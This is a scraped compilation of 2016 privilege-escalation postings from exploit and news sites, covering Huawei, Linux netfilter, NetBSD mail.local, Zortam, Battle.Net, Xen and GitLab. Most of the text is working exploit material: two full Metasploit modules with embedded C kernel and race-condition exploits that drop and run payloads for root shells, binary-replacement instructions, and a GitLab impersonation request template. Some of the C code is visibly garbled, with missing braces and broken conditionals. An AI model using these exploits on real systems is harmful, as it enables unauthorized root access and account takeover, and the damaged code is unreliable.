Privilege

  • info
  • discussion
  • exploit
  • solution
  • references
Multiple Huawei Products CVE-2016-8768 Local Privilege Escalation

Bugtraq ID: 93885
Class: Design Error
CVE: CVE-2016-8768
Remote: No
Local: Yes
Published: Oct 26 2016 12:00AM
Updated: Nov 25 2016 02:04PM
Credit: Zhao Jianqiang, Chen Gengjia, Wang Qize, Zhu Bin and Pan Yu.
Vulnerable: Huawei Honor 7 6.9
Huawei Honor 6 Plus 6.9
Huawei Honor 6 6.9
Not Vulnerable: Huawei Honor 7 6.9.16
Huawei Honor 6 Plus 6.9.16
Huawei Honor 6 6.9.16


SecurityFocus Vulnerabilities

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = )
super(update_info(info,
'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',
'Description' => %q{
This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently
only works against Ubuntu 16.04 (not 16.04.1) with kernel
4.4.0-21-generic.
Several conditions have to be met for successful exploitation:
Ubuntu:
1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)
2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile
Kernel 4.4.0-31-generic and newer are not vulnerable.

We write the ascii files and compile on target instead of locally since metasm bombs for not
having cdefs.h (even if locally installed)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <[email protected]>', # Module
'vnik' # Discovery
],
'DisclosureDate' => 'Jun 03 2016',
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Ubuntu', ]
#[ 'Fedora', ]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'EDB', '40049'],
[ 'CVE', '2016-4997'],
[ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']
]
))
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),
OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
], self.class)
end

def check
def iptables_loaded?()
# [email protected]:~$ cat /proc/modules | grep ip_tables
# ip_tables 28672 1 iptable_filter, Live 0x0000000000000000
# x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000
vprint_status('Checking if ip_tables is loaded in kernel')
if target.name == "Ubuntu"
iptables = cmd_exec('cat /proc/modules | grep ip_tables')
if iptables.include?('ip_tables')
vprint_good('ip_tables.ko is loaded')
else
print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')
end
return iptables.include?('ip_tables')
elsif target.name == "Fedora"
iptables = cmd_exec('cat /proc/modules | grep iptable_raw')
if iptables.include?('iptable_raw')
vprint_good('iptable_raw is loaded')
else
print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')
end
return iptables.include?('iptable_raw')
else
return false
end
end

def shemsham_installed?()
# we want this to be false.
vprint_status('Checking if shem or sham are installed')
shemsham = cmd_exec('cat /proc/cpuinfo')
if shemsham.include?('shem')
print_error('shem installed, system not vulnerable.')
elsif shemsham.include?('sham')
print_error('sham installed, system not vulnerable.')
else
vprint_good('shem and sham not present.')
end
return (shemsham.include?('shem') or shemsham.include?('sham'))
end

if iptables_loaded?() and not shemsham_installed?()
return CheckCode::Appears
else
return CheckCode::Safe
end
end

def exploit
# first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
def has_prereqs?()
vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')
if target.name == "Ubuntu"
lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')
if lib.include?('install')
vprint_good('libc6-dev-i386 is installed')
else
print_error('libc6-dev-i386 is not installed. Compiling will fail.')
end
multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')
if multilib.include?('install')
vprint_good('gcc-multilib is installed')
else
print_error('gcc-multilib is not installed. Compiling will fail.')
end
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
else
print_error('gcc is not installed. Compiling will fail.')
end
return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')
elsif target.name == "Fedora"
lib = cmd_exec('dnf list installed | grep -E \'(glibc-devel.i686|libgcc.i686)\'')
if lib.include?('glibc')
vprint_good('glibc-devel.i686 is installed')
else
print_error('glibc-devel.i686 is not installed. Compiling will fail.')
end
if lib.include?('libgcc')
vprint_good('libgcc.i686 is installed')
else
print_error('libgcc.i686 is not installed. Compiling will fail.')
end
multilib = false #not implemented
gcc = false #not implemented
return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib
else
return false
end
end

compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end

desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
payload_file = rand_text_alpha(8)
payload_path = "#datastore["WritableDir"]/#payload_file"

# direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here
# removed #include <netinet/in.h> per busterb comment in PR 7326
decr = %q{
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <netinet/in.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>

#define MALLOC_SIZE 66*1024

int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;

sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);

if (sock == -1)
perror("socket");
return -1;

data = malloc(MALLOC_SIZE);

if (data == NULL)
perror("malloc");
return -1;

memset(data, 0, MALLOC_SIZE);

repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;

entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);

ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));

strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!

uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;

ematch->u.match_size = (short)0xffff;

target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;

printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");

for (i = 0; i < 0xffffff/2+1; i++)
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);

close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");

return 0;
}

int main(void) {
void *stack;
int ret;

printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");

ret = unshare(CLONE_NEWUSER);

if (ret == -1)
perror("unshare");
return -1;

stack = (void *) malloc(65536);

if (stack == NULL)
perror("malloc");
return -1;

clone(decr, stack + 65536, CLONE_NEWNET, NULL);

sleep(1);

return 0;
}
}

# direct copy of code from exploit-db
pwn = %q{
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>

#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0

typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);

void __attribute__((regparm(3))) privesc()
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));

int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);

void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);

memset(shellcode, 0, 0x300000);

void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);

printf("[+] Escalating privs...\n");

int fd = open("/dev/ptmx", O_RDWR);
close(fd);

assert(!getuid());

printf("[+] We've got root!");

return execl("/bin/bash", "-sh", NULL);
}
}

# the original code printed a line. However, this is hard to detect due to threading.
# so instead we can write a file in /tmp to catch.
decr.gsub!(/printf\("\[\+\] Done\! Now run \.\/pwn\n"\);/,
"int fd2 = open(\"#env_ready_file\", O_RDWR|O_CREAT, 0777);close(fd2);" )

# patch in to run our payload
pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/,
"execl(\"#payload_path\", NULL);")

def pwn(payload_path, pwn_file, pwn, compile)
# lets write our payload since everythings set for priv esc
vprint_status("Writing payload to #payload_path")
write_file(payload_path, generate_payload_exe)
cmd_exec("chmod 555 #payload_path")
register_file_for_cleanup(payload_path)

# now lets drop part 2, and finish up.
rm_f pwn_file
if compile
print_status "Writing pwn executable to #pwn_file.c"
rm_f "#pwn_file.c"
write_file("#pwn_file.c", pwn)
cmd_exec("gcc #pwn_file.c -O2 -o #pwn_file")
register_file_for_cleanup("#pwn_file.c")
else
print_status "Writing pwn executable to #pwn_file"
write_file(pwn_file, pwn)
end
register_file_for_cleanup(pwn_file)
cmd_exec("chmod +x #pwn_file; #pwn_file")
end

if not compile # we need to override with our pre-created binary
# pwn file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')
fd = ::File.open( path, "rb")
pwn = fd.read(fd.stat.size)
fd.close
# desc file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')
fd = ::File.open( path, "rb")
decr = fd.read(fd.stat.size)
fd.close

# overwrite the hardcoded variable names in the compiled versions
env_ready_file = '/tmp/okDjTFSS'
payload_path = '/tmp/2016_4997_payload'
end

# check for shortcut
if datastore['REEXPLOIT']
pwn(payload_path, pwn_file, pwn, compile)
else
rm_f desc_file
if compile
print_status "Writing desc executable to #desc_file.c"
rm_f "#desc_file.c"
write_file("#desc_file.c", decr)
register_file_for_cleanup("#desc_file.c")
output = cmd_exec("gcc #desc_file.c -m32 -O2 -o #desc_file")
else
write_file(desc_file, decr)
end
rm_f env_ready_file
register_file_for_cleanup(env_ready_file)
#register_file_for_cleanup(desc_file)
if not file_exist?(desc_file)
vprint_error("gcc failure output: #output")
fail_with(Failure::Unknown, "#desc_file.c failed to compile")
end
if target.name == "Ubuntu"
vprint_status "Executing #desc_file, may take around 35s to finish. Watching for #env_ready_file to be created."
elsif target.name == "Fedora"
vprint_status "Executing #desc_file, may take around 80s to finish. Watching for #env_ready_file to be created."
end
cmd_exec("chmod +x #desc_file; #desc_file")
sec_waited = 0

until sec_waited > datastore['MAXWAIT'] do
Rex.sleep(1)
if sec_waited % 10 == 0
vprint_status("Waited #sec_waiteds so far")
end

if file_exist?(env_ready_file)
print_good("desc finished, env ready.")
pwn(payload_path, pwn_file, pwn, compile)
return
end
sec_waited +=1
end
end
end
end


Exploit Files ≈ Packet Storm

 # Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: [email protected]
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.zortam.com/
# Software Link: http://www.zortam.com/download.html
# Version: Software Version 21.15
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec

1. Description:

Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" with very weak file permissions granting any user full permission to the exe. This allows opportunity for code execution against any other user running the application.

2. Proof

C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R

3. Exploit:

Simply replace zmmspro.exe and wait for execution.


Exploit Files ≈ Packet Storm

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::FileDropper

def initialize(info = )
super(update_info(info,
'Name' => 'NetBSD mail.local Privilege Escalation',
'Description' => %q
This module attempts to exploit a race condition in mail.local with SUID bit set on:
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
NetBSD 6.1 - 6.1.5
NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
,
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <[email protected]>', # Module
'akat1' # Discovery
],

'DisclosureDate' => 'Jul 07 2016',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %wshell meterpreter,
'Privileged' => true,
'Payload' =>
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic openssl'

},
'Targets' =>
[
[ 'Automatic Target', ]
],
'DefaultTarget' => 0,
'DefaultOptions' => 'WfsDelay' => 603 , #can take 10min for cron to kick
'References' =>
[
[ "URL", "http://akat1.pl/?id=2"],
[ "EDB", "40141"],
[ "CVE", "2016-6253"],
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
]
))
register_options([
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
], self.class)
end

def exploit
# lots of this file's format is based on pkexec.rb

# direct copy of code from exploit-db
main = %q{
// Source: http://akat1.pl/?id=2

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <sys/wait.h>

#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"

static int
overwrite_atrun(void)
{
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;

fh = fopen(ATRUNPATH, "wb");

if (fh == NULL)
rv = -1;
goto out;

size = strlen(script);
if (size != fwrite(script, 1, strlen(script), fh))
rv = -1;
goto out;

out:
if (fh != NULL && fclose(fh) != 0)
rv = -1;

return rv;
}

static int
copy_file(const char *from, const char *dest, int create)
{
char buf[1024];
FILE *in = NULL, *out = NULL;
size_t size;
int rv = 0, fd;

in = fopen(from, "rb");
if (create == 0)
out = fopen(dest, "wb");
else {
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
if (fd == -1)
rv = -1;
goto out;

out = fdopen(fd, "wb");
}

if (in == NULL || out == NULL)
rv = -1;
goto out;

while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
if (fwrite(&buf, 1, size, in) != 0)
rv = -1;
goto out;

}

out:
if (in != NULL && fclose(in) != 0)
rv = -1;
if (out != NULL && fclose(out) != 0)
rv = -1;
return rv;
}

int
main()
{
pid_t pid;
uid_t uid;
struct stat sb;
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;

umask(0077);

login = getlogin();

if (login == NULL)
err(EXIT_FAILURE, "who are you?");

uid = getuid();

asprintf(&mailbox, MAILDIR "/%s", login);

if (mailbox == NULL)
err(EXIT_FAILURE, NULL);

if (access(mailbox, F_OK) != -1)
/* backup mailbox */
asprintf(&mailbox_backup, "/tmp/%s", login);
if (mailbox_backup == NULL)
err(EXIT_FAILURE, NULL);

if (mailbox_backup != NULL)
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
if (copy_file(mailbox, mailbox_backup, 1))
err(EXIT_FAILURE, "[-] failed");

/* backup atrun(1) */
atrun_backup = strdup("/tmp/atrun");
if (atrun_backup == NULL)
err(EXIT_FAILURE, NULL);

fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);

if (copy_file(ATRUNPATH, atrun_backup, 1))
err(EXIT_FAILURE, "[-] failed");

/* win the race */
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);

switch (pid = fork()) {
case -1:
err(EXIT_FAILURE, NULL);
/* NOTREACHED */
case 0:
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
"2> /dev/null", login);

for(;;)
system(buf);
/* NOTREACHED */

default:
umask(0022);
for(;;)
int fd;
unlink(mailbox);
symlink(ATRUNPATH, mailbox);
sync();
unlink(mailbox);
fd = open(mailbox, O_CREAT, S_IRUSR
}
}
break;
}
(void)waitpid(pid, NULL, 0);

if (mailbox_backup != NULL) {
/* restore mailbox */
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);

if (copy_file(mailbox_backup, mailbox, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(mailbox_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
}

/* overwrite atrun */
fprintf(stderr, "[+] overwriting atrun(1)\n");

if (chmod(ATRUNPATH, 0755) != 0)
err(EXIT_FAILURE, NULL);

if (overwrite_atrun())
err(EXIT_FAILURE, NULL);

fprintf(stderr, "[+] waiting for atrun(1) execution...\n");

for(;;sleep(1))
if (access("/tmp/ksh", F_OK) != -1)
break;

/* restore atrun */
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);

if (copy_file(atrun_backup, ATRUNPATH, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(atrun_backup) != 0)
err(EXIT_FAILURE, "[-] failed");

if (chmod(ATRUNPATH, 0555) != 0)
err(EXIT_FAILURE, NULL);

fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
"ownership.\n");
fprintf(stderr, "Enjoy your shell:\n");

execl("/tmp/ksh", "ksh", NULL);

return 0;
}
}
# patch in our variable maildir and atrunpath
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
"#define ATRUNPATH \"#datastore["ATRUNPATH"]\"")
main.gsub!(/#define MAILDIR "\/var\/mail"/,
"#define MAILDIR \"#datastore["MAILDIR"]\"")

executable_path = "#datastore["WritableDir"]/#rand_text_alpha(8)"
payload_file = "#rand_text_alpha(8)"
payload_path = "#datastore["WritableDir"]/#payload_file"
vprint_status("Writing Payload to #payload_path")
# patch in to run our payload as part of ksh
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
"execl(\"/tmp/ksh\", \"ksh\", \"#payload_path\", NULL);")

write_file(payload_path, payload.encoded)
cmd_exec("chmod 555 #payload_path")
register_file_for_cleanup(payload_path)

print_status "Writing exploit to #executable_path.c"

# clean previous bad attempts to prevent c code from exiting
rm_f executable_path
rm_f '/tmp/atrun'
whoami = cmd_exec('whoami')
rm_f "/tmp/#whoami"

write_file("#executable_path.c", main)
print_status("Compiling #executable_path.c via gcc")
output = cmd_exec("/usr/bin/gcc -o #executable_path.out #executable_path.c")
output.each_line

print_status('Starting the payload handler...')
handler()

print_status("Executing at #Time.now. May take up to 10min for callback")
output = cmd_exec("chmod +x #executable_path.out; #executable_path.out")
output.each_line

# our sleep timer
stime = Time.now.to_f
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
print_status("#Time.now")
register_file_for_cleanup(executable_path)
register_file_for_cleanup("#executable_path.out")
print_status("Remember to run: chown root:wheel #datastore["ATRUNPATH"]")
end
end


Exploit Files ≈ Packet Storm

# Exploit Title: Battle.Net 1.5.0.7963 Local Privilege Escalation
# Date: 11/09/2016
# Exploit Author: Tulpa
# Contact: [email protected]
# Author website: www.tulpa-security.com
# Vendor Homepage: www.battle.net
# Software Link: https://eu.battle.net/account/download/
# Version: Version 1.5.0.7963
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86

1. Description:

Battle.Net installs by default to "C:\Program Files (x86)\Battle.Net" with weak folder permissions granting any built-in user account with full permission to the contents of

the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the application. This is not limited to just

the Battle.Net directory, but also to any of Blizzards game installation folders as installed by Battle.Net.

2. Proof

C:\Program Files>cacls Battle.net
C:\Program Files\Battle.net BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

C:\Program Files>cacls "Diablo III"
C:\Program Files\Diablo III BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

C:\Program Files>cacls "StarCraft II"
C:\Program Files\StarCraft II BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

C:\Program Files>cacls Hearthstone
C:\Program Files\Hearthstone BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

C:\Program Files>cacls "Heroes of the Storm"
C:\Program Files\Heroes of the Storm BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

C:\Program Files (x86)>cacls "World of Warcraft"
C:\Program Files (x86)\World of Warcraft BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

3. Exploit:

Simply replace any of the game exe's or any of the dll's with your preferred payload and wait for execution.


Exploit Files ≈ Packet Storm

The Xen Project reported on Thursday that it has patched a total of four vulnerabilities that can be exploited for privilege escalation or denial-of-service (DoS) attacks.

One of the flaws, described in the XSA-185 advisory and tracked as CVE-2016-7092, allows a malicious 32-bit PV (paravirtualization) guest administrator to escalate their privileges to that of the host.

The issue affects all versions of Xen, but it can only be exploited by 32-bit PV guests on x86 hardware – 64-bit PV guests, x86 HVM (Hardware Virtual Machine) guests and ARM guests are not impacted.

A similar flaw, one that allows a malicious HVM guest administrator to escalate their privileges to that of the host, is tracked as CVE-2016-7093 and described in the XSA-186 advisory. The vulnerability affects Xen versions 4.6.3, 4.5.3, and 4.7.0 and later, but it can only be exploited on HVM guests running on x86 hardware.

XSA-187 describes an overflow issue that can be leveraged by an HVM guest admin to cause Xen to fail a bug check and lead to the host entering a DoS condition. The flaw, identified as CVE-2016-7094, affects all Xen versions and it can be exploited on HVM guests on x86 hardware when they are configured to run with shadow paging.

The last vulnerability, CVE-2016-7154, is a use-after-free that can be exploited by a guest administrator to crash the host (DoS condition). It’s also possible that this weakness, described in XSA-188, can be leveraged for information leaks and arbitrary code execution that leads to privilege escalation.

The list of individuals credited for finding and reporting these vulnerabilities includes Jérémie Boutoille of Quarkslab, Shangcong Luan of Alibaba Cloud, Brian Marcotte, Andrew Cooper of Citrix, and Intel Security’s Mikhail Gorobets.

Xen is used in Linux distributions and cloud services provided by companies such as Amazon, IBM, Linode and Rackspace. The Xen Project typically provides them patches before vulnerabilities are disclosed to give them enough time to address the issues.

On this occasion, Linode informed customers that it has updated its legacy Xen host servers to resolve these vulnerabilities, while Amazon told users that they are not affected. IBM and Rackspace had not released any advisories by the time this article was published.

Citrix, which provides a commercial version of Xen, informed customers that the vulnerabilities, classified as having medium and high severity, have been addressed in all supported versions of its XenServer product.

Related: Xen Patches Serious Privilege Escalation Flaw

Related: Xen Hypervisor Flaws Force Amazon, Rackspace to Reboot Servers

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

# Exploit Title: GitLab privilege escalation via "impersonate" feature
# Date: 02-05-2016
# Software Link: https://about.gitlab.com/
# Version: 8.2.0 - 8.2.4, 8.3.0 - 8.3.8, 8.4.0 - 8.4.9, 8.5.0 - 8.5.11, 8.6.0 - 8.6.7, 8.7.0
# Exploit Author: Kaimi
# Website: https://kaimi.ru
# CVE: CVE-2016-4340
# Category: webapps

1. Description

Any registered user can "log in" as any other user, including administrators.

https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/

2. Proof of Concept

Login as regular user.
Get current authenticity token by observing any POST-request (ex.: change any info in user profile).

Craft request using this as template:

POST /admin/users/stop_impersonation?id=root
. . .

_method=delete&authenticity_token=lqyOBt5U%2F0%2BPM2i%2BGDx3zaVjGgAqHzoteQ15FnrQ3E8%3D

Where 'root' - desired user. 'authenticity_token' - token obtained on the previous step.

3. Solution:

Use officialy provided solutions:
https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/


Exploit Files ≈ Packet Storm